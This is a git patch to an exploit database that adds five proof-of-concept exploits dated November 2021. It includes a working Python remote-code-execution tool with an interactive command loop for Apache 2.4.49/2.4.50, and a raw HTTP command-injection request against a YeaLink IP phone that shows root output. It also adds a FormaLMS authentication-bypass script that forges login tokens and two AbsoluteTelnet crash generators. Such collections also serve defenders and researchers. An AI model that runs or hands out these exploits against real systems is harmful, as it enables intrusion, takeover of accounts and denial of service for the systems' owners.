From 5310d503ac341baefb8993308dfcab09636abaa3 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 12 Nov 2021 05:02:08 +0000 Subject: [PATCH] DB: 2021-11-12 5 changes to exploits/shellcodes AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC) AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC) YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated) Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) FormaLMS 2.4.4 - Authentication Bypass --- exploits/hardware/webapps/50509.txt | 44 ++++++++++ exploits/multiple/webapps/50512.py | 121 ++++++++++++++++++++++++++++ exploits/multiple/webapps/50513.py | 51 ++++++++++++ exploits/windows/dos/50510.py | 37 +++++++++ exploits/windows/dos/50511.py | 36 +++++++++ files_exploits.csv | 5 ++ 6 files changed, 294 insertions(+) create mode 100644 exploits/hardware/webapps/50509.txt create mode 100755 exploits/multiple/webapps/50512.py create mode 100755 exploits/multiple/webapps/50513.py create mode 100755 exploits/windows/dos/50510.py create mode 100755 exploits/windows/dos/50511.py diff --git a/exploits/hardware/webapps/50509.txt b/exploits/hardware/webapps/50509.txt new file mode 100644 index 000000000..ce3279ee6 --- /dev/null +++ b/exploits/hardware/webapps/50509.txt @@ -0,0 +1,44 @@ +# Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated) +# Date: 11-10-2021 +# Exploit Author: tahaafarooq +# Vendor Homepage: https://www.yealink.com/ +# Version: 53.84.0.15 +# Tested on: YeaLink IP Phone SIP-T19P (Hadrware VOIP Phone) + +Description: + +Using Diagnostic tool from the Networking Tab to perform a Ping or Traceroute , to perform OS command injection + +POC: + +POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1 +Host: xxx.xxx.xxx.xxx +Content-Length: 49 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept: */* +Origin: http://xxx.xxx.xxx.xxx +Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: JSESSIONID=9a83d24461329a130 +Connection: close + +cmd=; id;&token=1714636915c6acea98 + +------------------------------------------------- + +HTTP/1.1 200 OK +Content-Type: text/html +Connection: close +Date: Wed, 10 Nov 2021 14:20:23 GMT +Server: embed httpd +Content-Length: 82 + + + +
+ uid=0(root) gid=0(root) +
+ + \ No newline at end of file diff --git a/exploits/multiple/webapps/50512.py b/exploits/multiple/webapps/50512.py new file mode 100755 index 000000000..3f6971971 --- /dev/null +++ b/exploits/multiple/webapps/50512.py @@ -0,0 +1,121 @@ +# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) +# Date: 11/11/2021 +# Exploit Author: Valentin Lobstein +# Vendor Homepage: https://apache.org/ +# Software Link: https://github.com/Balgogan/CVE-2021-41773 +# Version: Apache 2.4.49/2.4.50 (CGI enabled) +# Tested on: Debian GNU/Linux +# CVE : CVE-2021-41773 / CVE-2021-42013 +# Credits : Lucas Schnell + + +#!/usr/bin/env python3 +#coding: utf-8 + +import os +import re +import sys +import time +import requests +from colorama import Fore,Style + + +header = '''\033[1;91m + + ▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████ + ▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀ + ▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███ + ░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄ + ▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒ + ▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░ + ▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░ + ░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░ +''' + Style.RESET_ALL + + +if len(sys.argv) < 2 : + print( 'Use: python3 file.py ip:port ' ) + sys.exit() + +def end(): + print("\t\033[1;91m[!] Bye bye !") + time.sleep(0.5) + sys.exit(1) + +def commands(url,command,session): + directory = mute_command(url,'pwd') + user = mute_command(url,'whoami') + hostname = mute_command(url,'hostname') + advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)') + command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}") + command = f"echo; {command};" + req = requests.Request('POST', url=url, data=command) + prepare = req.prepare() + prepare.url = url + response = session.send(prepare, timeout=5) + output = response.text + print(output) + if 'clear' in command: + os.system('/usr/bin/clear') + print(header) + if 'exit' in command: + end() + +def mute_command(url,command): + session = requests.Session() + req = requests.Request('POST', url=url, data=f"echo; {command}") + prepare = req.prepare() + prepare.url = url + response = session.send(prepare, timeout=5) + return response.text.strip() + + +def exploitRCE(payload): + s = requests.Session() + try: + host = sys.argv[1] + if 'http' not in host: + url = 'http://'+ host + payload + else: + url = host + payload + session = requests.Session() + command = "echo; id" + req = requests.Request('POST', url=url, data=command) + prepare = req.prepare() + prepare.url = url + response = session.send(prepare, timeout=5) + output = response.text + if "uid" in output: + choice = "Y" + print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host) + print("[!] Sortie:\n\n" + Fore.YELLOW + output ) + choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ") + if choice.lower() in ['','y','yes']: + while True: + commands(url,command,session) + else: + end() + else : + print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host) + except KeyboardInterrupt: + end() + +def main(): + try: + apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' + apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' + payloads = [apache2449_payload,apache2450_payload] + choice = len(payloads) + 1 + print(header) + print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE") + while choice >= len(payloads) and choice >= 0: + choice = int(input('[~] Choice : ')) + if choice < len(payloads): + exploitRCE(payloads[choice]) + except KeyboardInterrupt: + print("\n\033[1;91m[!] Bye bye !") + time.sleep(0.5) + sys.exit(1) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/50513.py b/exploits/multiple/webapps/50513.py new file mode 100755 index 000000000..66fea3c3e --- /dev/null +++ b/exploits/multiple/webapps/50513.py @@ -0,0 +1,51 @@ +# Exploit Title: FormaLMS 2.4.4 - Authentication Bypass +# Google Dork: inurl:index.php?r=adm/ +# Date: 2021-11-10 +# Exploit Author: Cristian 'void' Giustini @ Hacktive Security +# Vendor Homepage: https://formalms.org +# Software Link: https://formalms.org +# Version: <= 2.4.4 +# Tested on: Linux +# CVE : CVE-2021-43136 + +# Info: An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain a valid access to the platform. + +# Analysis: +https://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/ + +# Nuclei template: +https://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml + +#!/usr/bin/env python + +""" + +The following exploit generates two URLs with empty and fixed value of the "secret". In order to achieve a successful exploitation the "Enable SSO with a third party software through a token" setting needs to be enabled + +""" + +import sys +import time +import hashlib + +secret = "8ca0f69afeacc7022d1e589221072d6bcf87e39c" + + def help(): + + print(f"Usage: {sys.argv[0]} username target_url") + + sys.exit() + + +if len(sys.argv) < 3: + + help() + +user, url = (sys.argv[1], sys.argv[2]) +t = str(int(time.time()) + 5000) +token = hashlib.md5(f"{user},{t},{secret}".encode()).hexdigest().upper() +final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}" +print(f"URL with default secret: {final_url}") +token = hashlib.md5(f"{user},{t},".encode()).hexdigest().upper() +final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}" +print(f"URL with empty secret: {final_url}") \ No newline at end of file diff --git a/exploits/windows/dos/50510.py b/exploits/windows/dos/50510.py new file mode 100755 index 000000000..60cd08922 --- /dev/null +++ b/exploits/windows/dos/50510.py @@ -0,0 +1,37 @@ +# Exploit Title: AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC) +# Discovered by: Yehia Elghaly +# Discovered Date: 2021-11-10 +# Vendor Homepage: https://www.celestialsoftware.net/ +# Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe +# Tested Version: 11.24 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64 + +# Description: AbsoluteTelnet 11.24 - 'SHA1/SHA2/Username' and 'Error Report' Denial of Service (PoC) + +# Steps to reproduce: +# 1. - Download and install AbsoluteTelnet +# 2. - Run the python script and it will create exploit.txt file. +# 3. - Open AbsoluteTelnet 11.24 +# 4. - "new connection file -> Connection -> SSH1 & SSH2" +# 5. - Paste the characters of txt file to "Authentication -> Username" +# 6. - press "ok" button +# 7. - Crashed +# 8. - Reopen AbsoluteTelnet 11.24 +# 9. - Copy the same characters to "Your Email Address (optional)" +# 10.- Click "Send Error Report" button +# 11.- Crashed + + +#!/usr/bin/python + +exploit = 'A' * 1000 + +try: + file = open("exploit.txt","w") + file.write(exploit) + file.close() + + print("POC is created") +except: + print("POC not created") \ No newline at end of file diff --git a/exploits/windows/dos/50511.py b/exploits/windows/dos/50511.py new file mode 100755 index 000000000..c5c29e6e2 --- /dev/null +++ b/exploits/windows/dos/50511.py @@ -0,0 +1,36 @@ +# Exploit Title: AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC) +# Discovered by: Yehia Elghaly +# Discovered Date: 2021-11-10 +# Vendor Homepage: https://www.celestialsoftware.net/ +# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe +# Tested Version: 11.24 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64 + +# Description: AbsoluteTelnet 11.24 - 'DialUp/Phone' & license name Denial of Service (PoC) + +# Steps to reproduce: +# 1. - Download and install AbsoluteTelnet +# 2. - Run the python script and it will create exploit.txt file. +# 3. - Open AbsoluteTelnet 11.24 +# 4. - "new connection file -> DialUp Connection +# 5. - Paste the characters of txt file to "DialUp -> phone" +# 6. - press "ok" button +# 7. - Crashed +# 8. - Reopen AbsoluteTelnet 11.24 +# 9. - Copy the same characters to "license name" +# 10.- Click "Send Error Report" button +# 11.- Crashed + +#!/usr/bin/python + +exploit = 'A' * 1000 + +try: + file = open("exploit.txt","w") + file.write(exploit) + file.close() + + print("POC is created") +except: + print("POC not created") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 54c19dd63..b85795061 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6803,6 +6803,8 @@ id,file,description,date,author,type,platform,port 50322,exploits/windows/dos/50322.py,"Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows, 50433,exploits/windows/dos/50433.py,"NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows, 50434,exploits/windows/dos/50434.py,"NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows, +50510,exploits/windows/dos/50510.py,"AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows, +50511,exploits/windows/dos/50511.py,"AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux, @@ -44606,3 +44608,6 @@ id,file,description,date,author,type,platform,port 50505,exploits/php/webapps/50505.py,"FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Luska,webapps,php, 50506,exploits/php/webapps/50506.txt,"Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Ragavender A G",webapps,php, 50507,exploits/php/webapps/50507.txt,"Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)",1970-01-01,"İlhami Selamet",webapps,php, +50509,exploits/hardware/webapps/50509.txt,"YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)",1970-01-01,tahaafarooq,webapps,hardware, +50512,exploits/multiple/webapps/50512.py,"Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)",1970-01-01,"Valentin Lobstein",webapps,multiple, +50513,exploits/multiple/webapps/50513.py,"FormaLMS 2.4.4 - Authentication Bypass",1970-01-01,"Cristian \'void\' Giustini",webapps,multiple,